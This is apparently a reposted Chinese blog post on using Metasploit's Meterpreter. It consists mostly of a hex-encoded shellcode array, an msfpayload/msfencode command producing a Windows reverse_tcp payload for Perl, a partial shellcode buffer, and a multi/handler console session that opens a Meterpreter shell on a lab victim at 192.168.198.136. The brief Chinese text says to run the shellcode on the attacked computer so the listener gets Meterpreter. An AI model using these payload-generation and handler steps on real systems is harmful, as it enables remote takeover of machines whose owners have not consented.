"\x42\x50\x5a\x50\x4b\x50\x4d\x52\x36\x50\x51\x50\x4d\x51" .
"\x33\x50\x5a\x50\x47\x52\x51\x50\x4e\x52\x4d\x50\x4f\x52" .
"\x55\x50\x4e\x51\x49\x51\x33\x50\x30\x51\x37\x54\x30\x51" .
"\x33\x50\x30\x52\x30\x50\x50\x50\x51\x43\x48\x50\x50\x50" .
"\x31\x50\x4e\x52\x4b\x50\x50\x52\x4f\x50\x4f\x43\x47\x50" .
"\x4b\x50\x4f\x50\x58\x52\x35\x50\x4d\x52\x4b\x50\x4c\x50" .
"\x30\x50\x4e\x51\x45\x50\x4f\x52\x32\x50\x51\x50\x46\x50" .
"\x43\x51\x48\x50\x4f\x51\x46\x50\x5a\x50\x35\x50\x4d\x52" .
"\x4d\x50\x4d\x50\x4d\x50\x4b\x50\x4f\x50\x4b\x43\x35\x50" .
"\x47\x50\x4c\x51\x37\x54\x36\x50\x43\x50\x4c\x50\x54\x50" .
"\x4a\x50\x4f\x52\x50\x51\x39\x52\x4b\x50\x4b\x52\x30\x51" .
"\x33\x50\x45\x50\x47\x52\x55\x50\x4f\x50\x4b\x50\x43\x54" .
"\x37\x50\x54\x52\x33\x51\x44\x50\x32\x50\x50\x52\x4f\x51" .
"\x42\x50\x4a\x50\x43\x50\x30\x52\x30\x51\x43\x50\x49\x52" .
"\x4f\x50\x58\x51\x45\x51\x35\x50\x33\x52\x31\x54\x31\x50" .
"\x50\x52\x4c\x50\x45\x50\x33\x51\x33\x50\x30\x51\x31\x51" .
"\x31\x41\x41";


meterpreter 使用  情况学习:

root@bt:/pentest/exploits/framework# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.198.135 R | ./msfencode -b '\x00' -t perl -e x86/alpha_mixed
[*] x86/alpha_mixed succeeded with size 642 (iteration=1)

my $buf = 
"\x89\xe6\xdb\xd8\xd9\x76\xf4\x58\x50\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x49\x6c\x4b\x58\x4e\x69\x45\x50\x43\x30" .
"\x47\x70\x43\x50\x4c\x49\x5a\x45\x50\x31\x4e\x32\x50\x64" .
"\x4e\x6b\x51\x42\x50\x30\x4e\x6b\x50\x52\x56\x6c\x4c\x4b" .··········
用的IP和端口 是  监听电脑的端口。在被攻击电脑上运行shellcode   然后监听电脑得到meterpreter

msf > use exploit/multi/handler 
msf  exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LPORT 4444
LPORT => 4444
msf  exploit(handler) > set LHOST 192.168.198.135
LHOST => 192.168.198.135
msf  exploit(handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.198.135  yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf  exploit(handler) > exploit 

[*] Started reverse handler on 192.168.198.135:4444 
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.198.136
[*] Meterpreter session 1 opened (192.168.198.135:4444 -> 192.168.198.136:3961) at 2014-06-02 23:09:44 +0800

meterpreter > 















转载于:https://www.cnblogs.com/zcc1414/p/3982391.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值